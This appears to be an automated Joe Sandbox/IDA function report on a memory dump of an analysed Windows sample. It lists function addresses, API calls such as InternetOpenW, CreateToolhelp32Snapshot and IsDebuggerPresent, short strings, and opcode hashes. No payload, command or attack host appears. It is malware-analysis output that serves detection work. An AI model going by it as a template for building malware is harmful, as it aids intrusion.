Function 007E2C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007E2C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007E2CA0

Strings

|, xrefs: 007E2C71

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: eb31296273077a2ef079a349760adae8f713b8699a99e0fdade8e5d279774d3c
Instruction ID: 1f5d9ab5656d3a3f989b61f56450048a5ce2ff6a0736cbb20c875be9bed2c5d4
Opcode Fuzzy Hash: eb31296273077a2ef079a349760adae8f713b8699a99e0fdade8e5d279774d3c
Instruction Fuzzy Hash: E7313971D01219EBCF01EFA1DC89AEEBFB9FF08300F100059F915A6262EB355916DBA0

Function 007831BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007C032B
GetOpenFileNameW.COMDLG32(?), ref: 007C0375

Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4

Part of subcall function 007909C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 007909E4

Strings

X, xrefs: 007C0343

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 3e8675e6d6b8338c15139361ac044abaa6204b00413a5a84d70eb1ef96013dbc
Instruction ID: 5bcf1942f814b1a1f9a3d16a1b6b64fd76271beba51ec41e40585f88dcddd953
Opcode Fuzzy Hash: 3e8675e6d6b8338c15139361ac044abaa6204b00413a5a84d70eb1ef96013dbc
Instruction Fuzzy Hash: 04218171A142989BDF41DFD8D849BEE7BFCAF49710F00405AE504E7241DBB85A89CFA1

Function 007E28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007E28F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007E2921

Strings

<local>, xrefs: 007E28E9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 02d661a6c353212d3c8622c4ef429382ca793b3ef31f7bee278fb8ccb3d47ed3
Instruction ID: 5e242ca9f9a2ccf7828a8f1e1d960cf50eef5893c1467d119f04d90951f4f4fb
Opcode Fuzzy Hash: 02d661a6c353212d3c8622c4ef429382ca793b3ef31f7bee278fb8ccb3d47ed3
Instruction Fuzzy Hash: 07110670502365BAEB248F528C89EF7FB6CFF19350F10412AF54552101E7786892DBF0

Function 007ED1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d85a69d3523379ad78f065a055f064877c3b345c87219f5dd0837ea8ac7bdc5
Instruction ID: eb47c197e284dd6059f8fadd1c8c770a5abfae1e73500e8387f65c1e6467cd2f
Opcode Fuzzy Hash: 9d85a69d3523379ad78f065a055f064877c3b345c87219f5dd0837ea8ac7bdc5
Instruction Fuzzy Hash: 77F12570608340DFCB24DF29C484A6ABBE5BF89354F14892EF8999B251D734ED45CF92

Function 00781680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007816DB
_memmove.LIBCMT ref: 0078174C
_memmove.LIBCMT ref: 007817B9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 25620d6b933b61d058b7dd1d59b0dd720da150978fb2081ffda6a6c0949c0e4b
Instruction ID: 500f12699de5fe434c678caa8e385ea8c45a9fda0f0653579cfc12f657a9fbec
Opcode Fuzzy Hash: 25620d6b933b61d058b7dd1d59b0dd720da150978fb2081ffda6a6c0949c0e4b
Instruction Fuzzy Hash: FA61E071600209EBDF009F29D8806AA77B9FF44710F95C169EC59CF295EB39DA61CB50

Function 0077AAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 007907BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007907EC
Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 007907F4
Part of subcall function 007907BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007907FF
Part of subcall function 007907BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0079080A
Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00790812
Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0079081A

Part of subcall function 0078FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0077AC6B), ref: 0078FFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0077AD08
OleInitialize.OLE32(00000000), ref: 0077AD85
CloseHandle.KERNEL32(00000000), ref: 007B2F56

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: bfc73c9ad537bbf1444434a3ad05d844a29ff1cf2771de21db9ca2338bf2c60a
Instruction ID: 8150bfc902fd9bbe208aeb21053630e7e8963b1921fd4feb30e29d220c70c508
Opcode Fuzzy Hash: bfc73c9ad537bbf1444434a3ad05d844a29ff1cf2771de21db9ca2338bf2c60a
Instruction Fuzzy Hash: B281CAF0909284CED3A8EF69AC496557FE8FBD8304B40896AD558C7372E774E408DF98

Function 007859D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007859F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00785A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00785ABB

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 5ed034ddc7cb086f6dec84a1b163ac98876e346c823c16a0f7de95d1df540e3f
Instruction ID: 72354979800def0c80197d01cc0d4f6a4f2d88627ccc2b2214f71ed0fd8f7bac
Opcode Fuzzy Hash: 5ed034ddc7cb086f6dec84a1b163ac98876e346c823c16a0f7de95d1df540e3f
Instruction Fuzzy Hash: 4F316FB0605B01DFD765EF24D8C4697BBE8FB48308F004E2EF99A86250E775A944CB92

Function 0079593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00795953

Part of subcall function 0079A39B: __NMSG_WRITE.LIBCMT ref: 0079A3C2
Part of subcall function 0079A39B: __NMSG_WRITE.LIBCMT ref: 0079A3CC

__NMSG_WRITE.LIBCMT ref: 0079595A

Part of subcall function 0079A3F8: GetModuleFileNameW.KERNEL32(00000000,008353BA,00000104,00000004,00000001,00791003), ref: 0079A48A
Part of subcall function 0079A3F8: ___crtMessageBoxW.LIBCMT ref: 0079A538

Part of subcall function 007932CF: ___crtCorExitProcess.LIBCMT ref: 007932D5
Part of subcall function 007932CF: ExitProcess.KERNEL32 ref: 007932DE

Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58

RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 0f7dc7c9576f18ec40ca0ca2002d446fe0bfb89d6f6c356b64b0fbadcca72618
Instruction ID: 9f3462843a1c049bc066d6b7564ad34eb66c745e715640f0ba430b5301a4a7c4
Opcode Fuzzy Hash: 0f7dc7c9576f18ec40ca0ca2002d446fe0bfb89d6f6c356b64b0fbadcca72618
Instruction Fuzzy Hash: 6B01B531341B22EAFE122B34BC46B2E33589F96770F510526F4199B2D1DE7CAD004761

Function 007E2953 Relevance: 4.5, APIs: 3, Instructions: 46networkCOMMON

Download Yara Rule

APIs

InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007E2970
_memset.LIBCMT ref: 007E298B
InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007E299B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: InternetOptionQuery$_memset
String ID:
API String ID: 3210845847-0
Opcode ID: c390a93bda1b2ea579a0094e073af14956e820f6967aaae69dcf10b2d42dfd3b
Instruction ID: 20adc0e6f79188235b4590487e649dcb60c05762529224d5b79ea6c83a17e8c5
Opcode Fuzzy Hash: c390a93bda1b2ea579a0094e073af14956e820f6967aaae69dcf10b2d42dfd3b
Instruction Fuzzy Hash: 2BF0AF71406218BFEB209F51EC85CEF3B5DEF083D0F448025F8085A142D63AAE91CAE4

Function 007D92C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007D92D6

Part of subcall function 00792F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792F99
Part of subcall function 00792F85: GetLastError.KERNEL32(00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792FAB

_free.LIBCMT ref: 007D92E7
_free.LIBCMT ref: 007D92F9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: df60bc8030d465a8eb60c729a0ae9799c68891edfbeaab5178e83e1983b4a1fc
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: C1E012A1705602A7CE24B5797984E9377FC5F88751715051EB50AE7643DE2CF8428168

Function 00775E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 007AE234

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 3d1a6dee672a5809688c46c59e2bb6bd59ac93ca456b33e1842c459ebd0de2c6
Instruction ID: 18168726d87f629e8dee4a863af773d18e1d39775392d4fae118c8c4a0c46381
Opcode Fuzzy Hash: 3d1a6dee672a5809688c46c59e2bb6bd59ac93ca456b33e1842c459ebd0de2c6
Instruction Fuzzy Hash: 0D325770608741DFCB24DF14C494A2ABBE1BF85384F14C96DE88A9B366D779EC45CB82

Function 007848B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007848FA

Strings

EA06, xrefs: 007C08A1

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 38e99e5cd34064172b83fc90695c211a7330ae80a09a31b85c5ca24a93ed93be
Instruction ID: 57c9bdcdb0a16cebfde73c4b34fd8a37e48b1bbf6d9baa61e47d50dc364ccf9e
Opcode Fuzzy Hash: 38e99e5cd34064172b83fc90695c211a7330ae80a09a31b85c5ca24a93ed93be
Instruction Fuzzy Hash: CD41A032A44159EBDF31AB5488557BF7FA59F45300F588079E8C1EB286D6AC9D8083E2

Function 007D6135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 007D614E

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: f7187dee92b236276325e04685f6a11783c86128200f260348c0750ac4c3c76f
Instruction ID: 0c348dee56184e235160d85e487d8fd578ef6a04d296e4df1cd9b00c309764c8
Opcode Fuzzy Hash: f7187dee92b236276325e04685f6a11783c86128200f260348c0750ac4c3c76f
Instruction Fuzzy Hash: 7D41B4B6600209EFDB21EFA8C8819AEB7B9FB44350B10452FE55697341EB389E45CB50

Function 00790E38 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 00790ED5
CreateToolhelp32Snapshot.KERNEL32 ref: 00790EE7

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ChangeCloseCreateFindNotificationSnapshotToolhelp32
String ID:
API String ID: 4162189087-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: ef3d6b4960996536f0d07e7bad0402ac624b6314dbb6f99fe93a4306aea7e510
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 3A31C371A10109DFDB18EF58E484969F7A6FF59300B648AA5E40ACB351EB35EEC1CBC0

Function 00785F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00785FEF

Part of subcall function 0079359C: __lock.LIBCMT ref: 007935A2
Part of subcall function 0079359C: DecodePointer.KERNEL32(00000001,?,00786004,007C8892), ref: 007935AE
Part of subcall function 0079359C: EncodePointer.KERNEL32(?,?,00786004,007C8892), ref: 007935B9

Part of subcall function 00785F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00785F18
Part of subcall function 00785F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00785F2D

Part of subcall function 00785240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078526C
Part of subcall function 00785240: IsDebuggerPresent.KERNEL32 ref: 0078527E
Part of subcall function 00785240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 007852E6
Part of subcall function 00785240: SetCurrentDirectoryW.KERNEL32(?), ref: 00785366

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0078602F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 9fcb2305502223eed009e0cab26ff6b800c5842ec52e94879fff9f8740b57ebd
Instruction ID: 6a17aa5638acaefe13f3eec59cf7bd6b387991bf4d4689edc7af93c08ee91586
Opcode Fuzzy Hash: 9fcb2305502223eed009e0cab26ff6b800c5842ec52e94879fff9f8740b57ebd
Instruction Fuzzy Hash: 1F1159B1908345DBC720EF69EC4990ABBE8FFD8750F00891EF585872B2DB749544CB96

Function 00790FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0079593C: __FF_MSGBANNER.LIBCMT ref: 00795953
Part of subcall function 0079593C: __NMSG_WRITE.LIBCMT ref: 0079595A
Part of subcall function 0079593C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F

std::exception::exception.LIBCMT ref: 0079101C
__CxxThrowException@8.LIBCMT ref: 00791031

Part of subcall function 007987CB: RaiseException.KERNEL32(?,?,?,0082CAF8,?,?,?,?,?,00791036,?,0082CAF8,?,00000001), ref: 00798820

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 196ecb02ebcbea1706d18689734c8dab25ac61d022053d8b31e4b1f83e059f7f
Instruction ID: d678c6ed0a0316b4e6656a728fc1d81cbd68ed49e4dc1794b83d2eab7e8afa1e
Opcode Fuzzy Hash: 196ecb02ebcbea1706d18689734c8dab25ac61d022053d8b31e4b1f83e059f7f
Instruction Fuzzy Hash: 64F0813550421EE6CF20AA98FC1A99E7BACAF01310F500459FD24D6291DFB99B94C2E1

Function 0079581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0079584C
__lock_file.LIBCMT ref: 0079586D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: d219f870801d0d3109a5f858ef666f8e509b6ca2c164f6514409aa45397a0ae9
Instruction ID: b25c45233f5866a10596686c84d98fb41be484de8e562d638a162cf1d7acbd6f
Opcode Fuzzy Hash: d219f870801d0d3109a5f858ef666f8e509b6ca2c164f6514409aa45397a0ae9
Instruction Fuzzy Hash: AA018471801A18EBCF12AF69FC09C9E7B61AF81760F184216F8245A1A1D7398A21DF91

Function 007955C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58

__lock_file.LIBCMT ref: 0079560B

Part of subcall function 00796E3E: __lock.LIBCMT ref: 00796E61

__fclose_nolock.LIBCMT ref: 00795616

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 21630cf09e124bb6c2c50934fe699539c94fc073d865b081df6d238e2dee38fe
Instruction ID: be898261e7ecbb440ca7b68b90343d5f657d0ca01070da3130e6abaa730c4770
Opcode Fuzzy Hash: 21630cf09e124bb6c2c50934fe699539c94fc073d865b081df6d238e2dee38fe
